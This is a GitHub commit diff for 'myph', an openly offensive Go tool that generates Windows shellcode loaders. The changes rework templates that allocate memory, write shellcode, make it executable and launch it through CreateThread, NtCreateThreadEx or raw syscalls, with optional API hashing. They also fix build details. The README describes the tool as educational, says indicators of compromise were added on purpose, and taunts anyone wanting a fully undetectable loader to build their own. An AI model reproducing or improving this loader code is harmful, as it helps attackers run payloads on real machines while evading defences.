Skip to content

Commit

Permalink
v1.2.3: minor fixes
Browse files Browse the repository at this point in the history
  • Loading branch information
djnnvx authored Jan 30, 2024
2 parents fb5a840 + d37fae2 commit 09dc0e6
Show file tree
Hide file tree
Showing 9 changed files with 109 additions and 52 deletions.
2 changes: 2 additions & 0 deletions .goreleaser.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -20,6 +20,8 @@ builds:
- linux
- windows
- darwin
goarch:
- amd64

archives:
- format: tar.gz
Expand Down
6 changes: 5 additions & 1 deletion Makefile
Original file line number Diff line number Diff line change
Expand Up @@ -2,7 +2,7 @@
# -------------------

APP_NAME = myph
APP_VERSION = 1.2.2
APP_VERSION = 1.2.3
GIT_REVISION = `git rev-parse HEAD`
DOCKER_IMAGE_TAG ?= $(APP_VERSION)
DOCKER_LOCAL_IMAGE = $(APP_NAME):$(DOCKER_IMAGE_TAG)
Expand Down Expand Up @@ -56,3 +56,7 @@ clean: ## clean up the project directory
.PHONY: docker
docker: ## build a local docker image
@docker build . -t $(APP_NAME):latest -t $(APP_NAME):$(APP_VERSION)

.PHONY: release-build
release-build: ## makes a release build locally on the current commit
@goreleaser release --skip=publish --snapshot
3 changes: 3 additions & 0 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -12,6 +12,9 @@ for general information and testing. The tool and this repository are carefully
However, the developers cannot be held liable for for any damage, direct or indirect, of whatever nature as a result of
or related to the access to or use of the software.

> IOCs have voluntarily been added to the project. Don't open any issues regarding detections, it's pointless.
> The goal of this project is to learn & teach. If you want a FUD loader, dont be a baby and make your own.
## How to use the software ?

> Please note this project is under development & subject to changes.
Expand Down
34 changes: 27 additions & 7 deletions cli/parser.go
Original file line number Diff line number Diff line change
Expand Up @@ -71,7 +71,7 @@ func BuildLoader(opts *Options) *exec.Cmd {

func GetParser(opts *Options) *cobra.Command {

version := "1.2.2"
version := "1.2.3"
var spoofMetadata = &cobra.Command{
Use: "spoof",
Version: version,
Expand Down Expand Up @@ -143,6 +143,32 @@ func GetParser(opts *Options) *cobra.Command {
os.Exit(1)
}

if opts.UseAPIHashing {
fmt.Printf("[+] Retrieving dependencies to use API Hashing...\n")

execGoGetCmd := exec.Command("go", "get", "github.com/Binject/debug/pe")
execGoGetCmd.Dir = MYPH_TMP_DIR
_, _ = execGoGetCmd.Output()

if opts.WithDebug {
// if running debug, we want to have the local internals because
// it makes development easier

fmt.Printf("[+] Running \"cp -r ./internals /tmp/myph-out\"\n")

execGoGetCmd = exec.Command("cp", "-r", "./internals", MYPH_TMP_DIR)
execGoGetCmd.Dir = "."
_, _ = execGoGetCmd.Output()

} else {
// this should stay to cmepw addr
execGoGetCmd = exec.Command("go", "get", "github.com/cmepw/myph/internals")
execGoGetCmd.Dir = MYPH_TMP_DIR
_, _ = execGoGetCmd.Output()
}

}

/* reading the shellcode as a series of bytes */
shellcode, err := tools.ReadFile(opts.ShellcodePath)
if err != nil {
Expand Down Expand Up @@ -274,12 +300,6 @@ func GetParser(opts *Options) *cobra.Command {

fmt.Printf("\n[+] Template (%s) written to tmp directory. Compiling...\n", opts.Technique)

if opts.UseAPIHashing {
execGoGetCmd := exec.Command("go", "get", "github.com/Binject/debug/pe")
execGoGetCmd.Dir = MYPH_TMP_DIR
_, _ = execGoGetCmd.Output()
}

execCmd := BuildLoader(opts)
execCmd.Dir = MYPH_TMP_DIR

Expand Down
33 changes: 20 additions & 13 deletions loaders/createThread.go
Original file line number Diff line number Diff line change
Expand Up @@ -35,24 +35,15 @@ import (
}

func (t CreateTTemplate) Const() string {
return fmt.Sprintf(`
if !t.UseApiHashing {

return fmt.Sprintf(`
const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40
)
`)
}

func (t CreateTTemplate) Init() string {

if t.UseApiHashing {
return fmt.Sprintf("\n")
}

return fmt.Sprintf(`
var (
kernel32 = syscall.MustLoadDLL("kernel32.dll")
ntdll = syscall.MustLoadDLL("ntdll.dll")
Expand All @@ -63,7 +54,23 @@ var (
RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
)
`)
`)

}

return fmt.Sprintf(`
const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40
)
`)
}

func (t CreateTTemplate) Init() string {
return fmt.Sprintf("\n")
}

func (t CreateTTemplate) Process() string {
Expand Down
48 changes: 30 additions & 18 deletions loaders/ntCreateThreadEx.go
Original file line number Diff line number Diff line change
Expand Up @@ -29,6 +29,8 @@ import (

return fmt.Sprintf(`
import (
"fmt"
"log"
"syscall"
"unsafe"
)
Expand All @@ -38,30 +40,40 @@ import (
func (t NtCreateThreadExTemplate) Const() string {
// same consts with or without API Hashing

return fmt.Sprintf(`
const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READ = 0x20
PAGE_READWRITE = 0x04
)
`)
}

func (t NtCreateThreadExTemplate) Init() string {

if t.UseApiHashing {
return fmt.Sprintf("\n")
return fmt.Sprintf(`
const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READ = 0x20
PAGE_READWRITE = 0x04
)
`)
}

return fmt.Sprintf(`
ntdll := syscall.MustLoadDLL("ntdll.dll")
const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READ = 0x20
PAGE_READWRITE = 0x04
)
var (
NtAllocateVirtualMemory = ntdll.MustFindProd("NtAllocateVirtualMemory")
NtWriteVirtualMemory = ntdll.MustFindProd("NtWriteVirtualMemory")
NtProtectVirtualMemory = ntdll.MustFindProd("NtProtectVirtualMemory")
NtCreateThreadEx = ntdll.MustFindProd("NtCreateThreadEx")
ntdll = syscall.MustLoadDLL("ntdll.dll")
NtAllocateVirtualMemory = ntdll.MustFindProc("NtAllocateVirtualMemory")
NtWriteVirtualMemory = ntdll.MustFindProc("NtWriteVirtualMemory")
NtProtectVirtualMemory = ntdll.MustFindProc("NtProtectVirtualMemory")
NtCreateThreadEx = ntdll.MustFindProc("NtCreateThreadEx")
)
`)

}

func (t NtCreateThreadExTemplate) Init() string {
return fmt.Sprintf("\n")
}

func (t NtCreateThreadExTemplate) Process() string {
Expand Down
33 changes: 21 additions & 12 deletions loaders/syscall.go
Original file line number Diff line number Diff line change
Expand Up @@ -36,34 +36,43 @@ import (
}

func (t SysTemplate) Const() string {
// same consts with or without API Hashing

return fmt.Sprintf(`
if t.UseApiHashing {
return fmt.Sprintf(`
const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READ = 0x20
PAGE_READWRITE = 0x04
)
`)
}

func (t SysTemplate) Init() string {

if t.UseApiHashing {
return fmt.Sprintf("\n")
}

return fmt.Sprintf(`
kernel32 := syscall.MustLoadDLL("kernel32.dll")
ntdll := syscall.MustLoadDLL("ntdll.dll")
const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READ = 0x20
PAGE_READWRITE = 0x04
)
var (
kernel32 = syscall.MustLoadDLL("kernel32.dll")
ntdll = syscall.MustLoadDLL("ntdll.dll")
VirtualAlloc = kernel32.MustFindProc("VirtualAlloc")
VirtualProtect = kernel32.MustFindProc("VirtualProtect")
RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
)
VirtualAlloc := kernel32.MustFindProc("VirtualAlloc")
VirtualProtect := kernel32.MustFindProc("VirtualProtect")
RtlCopyMemory := ntdll.MustFindProc("RtlCopyMemory")
`)
}

func (t SysTemplate) Init() string {
return fmt.Sprintf("\n")
}

func (t SysTemplate) Process() string {
if t.UseApiHashing {
return fmt.Sprintf(`
Expand Down
2 changes: 1 addition & 1 deletion loaders/utils.go
Original file line number Diff line number Diff line change
Expand Up @@ -3,7 +3,7 @@ package loaders
func InformExpermimental() {
println("[!] The API hashing feature is still in an an experimental stage!!")
println("Only a few methods are supported for now:")
println("\t-Syscall\n\t-CreateThread\n\t-tNtCreateThreadEx\n")
println("\t-Syscall\n\t-CreateThread\n\t-NtCreateThreadEx\n")
}

func InformProcessUnused(process string) {
Expand Down
Binary file removed utils/utils
Binary file not shown.

0 comments on commit 09dc0e6

Please sign in to comment.